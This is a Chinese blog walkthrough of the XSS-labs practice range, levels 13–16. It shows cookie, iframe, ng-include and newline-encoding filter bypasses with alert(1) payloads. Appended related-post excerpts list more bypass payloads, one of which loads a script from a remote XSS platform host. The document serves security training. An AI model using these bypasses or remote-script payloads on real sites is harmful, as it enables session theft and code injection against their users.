XSS-labs靶场通关秘籍(level 13-16)

已于 2022-09-23 19:58:12 修改
阅读量1k 收藏
点赞数
分类专栏: xss-labs 文章标签: xss 前端 javascript web安全
于 2022-09-23 19:57:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45741871/article/details/127009530
版权

XSS-labs靶场通关秘籍(level 13-16)

level 13

进入靶场,使用GET请求方式传递参数keyword的值,使用测试xss注入代码进行注入,查看过滤

<script " ' Oonn>

在这里插入图片描述
右键查看页面源码,发现没有接收keyword参数值的变量,但是有四个隐藏变量,向四个隐藏变量发送xss注入代码进行注入
使用GET请求方式向t_link变量传递参数

click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
查看页面源码发现t_link没有接收传递的参数值,但是t_cookie变量里出现了值:call me maybe?
在这里插入图片描述
抓取请求数据包,发现在请求数据包中cookie变量传递的参数与页面源码中显示的一致
在这里插入图片描述
修改cookie的值,写入xss注入代码
在这里插入图片描述
放包,页面出现按钮,点击提示通过
在这里插入图片描述

level 14

进入靶场,发现浏览器在请求这个地址:http://www.exifviewer.org/,等待请求完成后发现这个网站没有回应
在这里插入图片描述
在网上查找资料发现该网站已经挂了,查看源码发现该关卡使用iframe标签将该网站的URL地址包含到该页面中进行访问

在这里插入图片描述
在本地创建一个xss.php文件,将此处iframe标签中的URL地址修改为本地xss.php文件的地址

<script>
window.alert = function()  
{     
	confirm("完成的不错!");
	window.location.href="level15.php?src=1.gif"; 
}
</script>	

<?php
	
	$id = $_GET['id'];
	echo $id;

?>

在这里插入图片描述

"http://127.0.0.1/xss/xss.php?id='<script>alert(1)</script>'"

防止页面直接请求http://www.exifviewer.org/,将burp开启进行拦截
在这里插入图片描述
修改页面iframe包含的URL地址,页面提示通关
在这里插入图片描述

level 15

进入靶场,发现页面使用GET请求方式传递参数
在这里插入图片描述
直接使用测试xss注入代码进行注入,测试过滤

<script " ' Oonn>

查看页面源码,发现存在过滤,过滤<>和双引号"
在这里插入图片描述
但是页面使用ng-include指令
AngularJS ng-include 指令 | 菜鸟教程

ng-include 是 angular js 中的东西,其作用相当于php的include函数。这里就

是将1.gif这个文件给包含进来。

ng-include 属性的值可以是一个表达式,返回一个文件名。

直接将第一关的URL地址构造成xss注入代码进行注入

?src='http://127.0.0.1/xss/level1.php?name=<img src=1 onerror=alert(1)>'

在这里插入图片描述
发送请求,页面弹窗提示通关
在这里插入图片描述

level 16

进入靶场,看到GET传参,直接上xss代码测试

<script " ' Oonn>

在这里插入图片描述
根据页面回显发现将script过滤,大小写敏感
查看页面源码发现将script和空格都替换为实体编码:&nbsp;,此时的空格不能正常使用,所写的xss代码也会变成连在一起,不能正常解析
在这里插入图片描述
标签<center>所支持的事件属性
在 HTML 4.01 中,<center> 标签支持如下事件属性
在这里插入图片描述

使用%0A代替空格

http://127.0.0.1/xss/level16.php?keyword=<img%0asrc=1%0aοnmοuseοver="alert(1)">

点击发送请求,页面出现图片,当鼠标移入图片时页面提示通关
在这里插入图片描述
在这里插入图片描述

xss-labs靶场训练(10-13关)
ldzhhh的博客
05-23 1023
第十关 先用<script>alert(xss)</script>试试 这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort。 把三个参数都传进去试试看: http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3 发现t_sort可以传入参数,构造Payload: t_sort=<sc
XSSxss-labs靶场通关
qq_62987084的博客
09-22 1069
xss-labs靶场通关详解
XSSxss-labs-level13
Hugu
02-24 524
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
xss-labs/level13
m0_71299382的博客
11-29 170
xss-labs/level13
XSS LABS - Level 13 过关思路
Blue17 の 小窝
08-27 2016
它提供了一系列快捷工具和功能,可以帮助用户执行各种网络攻击和测试,包括 XSS、SQL 注入、CSRF、XXE、路径穿越等漏洞,以下是 HackBar 插件的一些主要特点和功能:自定义请求发送:HackBar 允许用户自定义 HTTP 请求,并可以通过插件直接发送这些请求。用户可以手动构造 GET 和 POST 请求,并添加自定义的 HTTP 头部、参数等信息。既然,回显点清楚了,那么下面就是使用工具修改 Cookie 值,重新发送请求了。,cook,联想一下,
xss-labs第1~13
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 3247
文章目录伪重点第1关第2关第3关第4关第5关第6关第7关第8关第9关第10关第11关第12关第13关 伪重点 <script>alert(1);</script> //直接嵌入script <script src=https://xsspt.com/MQzN0Z></script> //从远程嵌入script <input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入scr
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 3366
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xss-labsxss-labs 靶场通关(1-9)
m0_71944965的博客
08-31 1451
查看网站源码,可以发现get传参name的值test插入了html里头 直接在url后加上JS语句即可 第二关 lever2 查看网页源码发现和第一关差不多,先在url后加上JS语句试试 发现报错 再次查看源码,发现JS语句被包在中没有执行 应该闭合 第三关 level3 先输入123456,然后查看网站源码 所以还是闭合问题,输入第二题的JS语言试试 发现报错 用单引号闭合试试,还是报错,检查源代码 发现符号被过滤 我们可以利用onclick绕过号的过滤来达到执行js的目的在文本框输
xss-labs靶场level15攻略 页面中html引用法
godfish44的博客
09-17 320
经过不懈努力,我们成功通过了前面12关,需要注意的是,十三关的技巧与十一关和十二关大同小异,只是将注入的位置改为cookie即可,而第十四关页面中内嵌的网页已经无法访问了,我们直接跳过,接下来我们一起看第十五关。函数可以理解为文件包含的作用,它可以直接引用同一域名下的html页面,通俗点来说,就是在页面中导入另一个页面,它是基于AngularJS框架的。弄清楚了这一点,我们只需要把aaaaa替换为另一个网页的html文件,就可以显示出该网页并利用该网页的漏洞成功执行代码,弹出警告框。
xss-labs靶场通关攻略(1-20)
A2893992091的博客
08-25 298
输入后发现没有反应,点击一下输入框获取焦点触发onfocus事件。提示payload长度为4,尝试在url中输入xss攻击指令。查询源码发现符号被实体化,尝试采用onfocus事件绕过。发现过滤符号且双引号闭合,尝试使用onfocus绕过。发现onfocus会被过滤,尝试使用a href标签法。查看源代码发现闭合方式为”>查看源码,尝试闭合后攻击。使用onfocus绕过。输入xss攻击语句测试。输入攻击语句测试一下。输入攻击语句进行测试。
xss-labs-master 1-13 (附解题过程及思路)
weixin_47306547的博客
09-25 1539
XSS测试代码 <script script '" OOnn> 可测试过滤的内容,如大小写,特殊符号,特殊标n签等 第 1 关 过关代码:name=<script>alert(/xss/)</script> 第 2 关 过关代码:keyword= "><script>alert(/xss/)</script> 第 3 关 过关代码:keyword=' onmouseover='alert(...
XSS-Labs靶场通关记录 1 - 13
SEV__en的博客
07-28 777
XSS(crosssitescripting)跨站脚本攻击,攻击者将自己的恶意js代码让受害者浏览器执行。
跨站脚本攻击xss-labs(1-20)靶机练手
duoba_an的博客
03-03 2146
XSS又叫CSS(Cross Site Script)跨站脚本攻击,是指恶意攻击者往web页面中插入恶意代码,当用户浏览该网页时,嵌入其中的恶意代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击。XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,从而达到劫持用户会话的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了Web客户端的逻辑,在这个基础上,黑客或攻击者可以轻易地发动各种各样的攻击。
xsslabs通关
qq_61774705的博客
07-15 918
两个地方都用了htmlspecialchars($str),它的作用是将特殊符号转换成HTML实体,就是HTML为了防止特殊符号,如"
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 4333
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
XSS-Lab(XSS注入笔记1-16
小谢的博客
10-29 5289
XSS-Lab(XSS注入笔记1-16
XSS-labs 1-13通关攻略
qq_57861415的博客
01-31 1796
xsslabs 1-13关攻略
xss-labs靶场第十三关测试报告
ccc_9wy的博客
10-25 638
xss-labs靶场第十三关渗透测试;get型xss注入;反射型xss;绕过姿势;代码审计绕过;phpstudy;cookie注入;
XSS漏洞-05】XSS-labs靶场通关大挑战
m0_64378913的博客
05-31 3229
目录1 实验简介2 XSS通关过程2.0 通关前注意2.1 关卡12.2 关卡22.3 关卡32.4 关卡42.5 关卡52.6 关卡62.7 关卡72.8 关卡82.9 关卡92.10 关卡102.11 关卡112.12 关卡122.13 关卡133 总结 1 实验简介 实验网站/靶场:http://test.ctf8.com/。 实验目的: 熟悉XSS漏洞测试的过程; 判断是否过滤与过滤规则; 练习XSS语句构造与绕过方法; 一边练习一边结合SQL注入进行比较; 一边练习一边思考编码与转码,后续补充这
xss-labs靶场通关详解11
最新发布
03-12
</think>### XSS-Labs Level 11 解题思路 这一关的核心在于**绕过htmlspecialchars()过滤**并利用**Flash XSS漏洞**,具体步骤如下: 1. **分析过滤机制** 根据引用[^3],输入的双引号会被htmlspecialchars()转换...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值